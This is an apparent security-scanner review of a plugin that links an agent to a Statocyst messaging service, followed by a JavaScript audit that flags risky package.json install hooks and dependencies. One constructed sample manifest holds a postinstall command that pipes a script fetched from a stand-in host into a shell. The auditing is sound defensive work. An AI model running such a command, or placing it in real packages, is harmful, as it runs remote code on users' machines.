Plugin v0.1.1
ClawScan security
Statocyst Realtime · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
Benign · Mar 27, 2026, 6:11 PM
- Verdict: benign
- Confidence: high
- Model: gpt-5-mini
- Summary: The package implements a realtime Statocyst transport and tools that match its description. It needs a Statocyst baseUrl and bearer token (supplied via plugin config or a config file) and registers with, and then uses, a remote Statocyst service. The only notable inconsistency is that the registry metadata does not declare those required config items.
- Guidance: This plugin appears to do what it says: connect to a Statocyst server, register the plugin, open a websocket, and exchange skill_request/skill_result messages. Before installing:
  1) Expect to supply a Statocyst baseUrl and a bearer token (via plugin config, or a JSON config file, optionally named by STATOCYST_CONFIG_FILE); the registry metadata's failure to declare these is an oversight.
  2) The plugin registers itself with the remote Statocyst service and logs usage there (telemetry on agent/plugin usage). Do not give it a high-privilege token; create an agent token with the minimum scope and trust the integration needs.
  3) Review and trust the Statocyst host (baseUrl) you configure: that host receives every skill request and sees the agent's activity.
  4) Confirm package provenance (the npm package, the ClawHub listing and the GitHub repo should agree) and test in a staging environment first.
  5) The repository contains e2e/dev scripts (docker, spawnSync) used only for tests. The plugin does not execute them at runtime, but you can review them if you want to validate behavior locally.
Review Dimensions
- Purpose & Capability (note): The plugin's code, README, and SKILL.md implement realtime websocket messaging, skill_request/skill_result exchange, and plugin registration with Statocyst, exactly what the name and description say. The registry metadata lists no required env vars, but the plugin requires a Statocyst bearer token and baseUrl (via plugin config or a config file); that omission is inconsistent with the documented runtime needs.
- Instruction Scope (ok): The runtime instructions constrain behavior to Statocyst integration: registering the plugin, opening a dedicated websocket at /v1/openclaw/messages/ws, sending publish/ack/pull messages, and optionally reading a JSON config file (e.g., /etc/molten/statocyst-openclaw.json). There are no instructions to read unrelated system files or to exfiltrate arbitrary host data. The README also documents that plugin usage is recorded on the remote Statocyst service, which is expected for this integration.
- Install Mechanism (ok): There is no high-risk download or install step in the package manifest: the code is included, package.json points to a published npm package, and the only runtime dependency is the well-known 'ws' npm library. The install spec contains no downloads from arbitrary URLs and no archive extraction.
- Credentials (note): The plugin legitimately needs a Statocyst bearer token, baseUrl, and sessionKey, plus an optional configFile and timeout; all are documented in SKILL.md and enforced by the code. However, the registry's 'required env vars' metadata is empty, which is misleading. The plugin reads process.env and an optional config file (possibly under /etc) for the token; that is proportionate to its purpose, but make sure the token you provide is minimally scoped.
- Persistence & Privilege (ok): The plugin does not request always:true and does not modify other plugins or system-wide settings. It registers itself with the remote Statocyst service (remote telemetry and usage logging), which is normal for this kind of adapter but increases the remote service's visibility into agent activity.
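The Install Mechanism dimension above lists the things a scanner looks for in a package manifest. As an added example (not ClawHub's scanner and not the plugin's code), here is a pre-install audit that applies those checks to a package.json: lifecycle scripts that execute during npm install, dependencies fetched from URLs, git or local paths rather than the registry, runtime dependencies outside an allow-list (only 'ws', the one dependency the review reports), and a missing repository field that would block a provenance cross-check. The two sample manifests are constructed for the example and are not the real plugin's package.json.

```javascript
// Added example (not ClawHub's scanner or the plugin's code). A pre-install audit
// of a package.json covering the points in the Install Mechanism dimension.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Dependency specifiers that resolve outside the npm registry:
// http(s) tarballs, git URLs, hosted-repo shorthands, local files/links, and "user/repo".
const NON_REGISTRY_SPEC = /^(https?:|git(\+[a-z]+)?:|github:|gitlab:|bitbucket:|file:|link:|[\w.-]+\/[\w.-]+(#.*)?$)/i;

function auditManifest(manifestJson, { allowedDeps = ["ws"] } = {}) {
  const pkg = JSON.parse(manifestJson);
  const findings = [];
  const flag = (severity, where, detail) => findings.push({ severity, where, detail });

  // Any of these scripts runs arbitrary code on the installing machine.
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) flag("high", `scripts.${hook}`, `runs during npm install: ${scripts[hook]}`);
  }

  // Dependencies that install with the package (devDependencies do not, so they are skipped).
  const installed = { ...(pkg.optionalDependencies || {}), ...(pkg.dependencies || {}) };
  for (const [name, spec] of Object.entries(installed)) {
    if (typeof spec !== "string" || NON_REGISTRY_SPEC.test(spec)) {
      flag("high", `dependencies.${name}`, `non-registry source: ${spec}`);
    } else if (!allowedDeps.includes(name)) {
      flag("note", `dependencies.${name}`, `runtime dependency not on the allow-list (${spec}); review it`);
    }
  }

  if (!pkg.repository) flag("note", "repository", "no repository field; provenance cannot be checked against a source repo");

  const verdict = findings.some((f) => f.severity === "high") ? "review" : "ok";
  return { name: pkg.name, version: pkg.version, verdict, findings };
}

// Constructed sample manifests (not the real plugin's package.json).
const CLEAN_MANIFEST = JSON.stringify({
  name: "example-statocyst-plugin",
  version: "0.1.1",
  repository: "github:example/statocyst-openclaw",
  dependencies: { ws: "^8.0.0" },
  scripts: { test: "node --test" },
});

const SUSPICIOUS_MANIFEST = JSON.stringify({
  name: "example-statocyst-plugin",
  version: "0.1.1",
  dependencies: {
    ws: "^8.0.0",
    "helper-lib": "git+https://example.invalid/helper.git",
    "tiny-util": "1.0.0",
  },
  scripts: { postinstall: "curl -fsSL https://example.invalid/bootstrap.sh | sh" },
});

module.exports = { auditManifest, CLEAN_MANIFEST, SUSPICIOUS_MANIFEST };
```

Run auditManifest over the manifest pulled from the npm tarball (not from the GitHub repo) so the check covers what actually gets installed; a "review" verdict means a human reads the flagged script or dependency before the package is allowed anywhere near a production agent.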
